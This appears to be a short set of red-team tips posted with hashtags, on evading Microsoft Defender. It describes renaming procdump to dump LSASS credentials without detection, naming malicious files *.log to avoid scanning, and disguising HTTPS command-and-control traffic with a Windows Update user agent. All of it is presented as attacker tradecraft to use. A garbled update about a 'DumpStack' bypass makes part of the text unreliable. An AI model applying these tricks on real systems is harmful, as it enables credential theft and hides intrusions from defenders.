Bypass Defender and dump LSASS via procdump.exe

If you rename procdump.exe to dump64.exe and place it in the "C:\Program Files (x86)\Microsoft Visual Studio\*" folder, you can bypass Defender and dump LSASS.

#lsass #dump #defender #bypass #dump64

Bypass Defender AV static detection:

If you name a malicious file *.log Defender doesn't scan it.

UPD:
DumpStack (by any file number) can bypass MDE easily with no detection as mimikatz or eicar mode.
The malicious file can be shown in the console but not identified as malicious.

#defender #evasion #tricks

Red Team Tips

To get rid of Microsoft Defender "behaviour based" amsi detection in case of opening a https C2 channel, it can help, to play with the parameter UserAgent. For example, try a Windows Update User Agent.

#redteam #tips #defender #bypass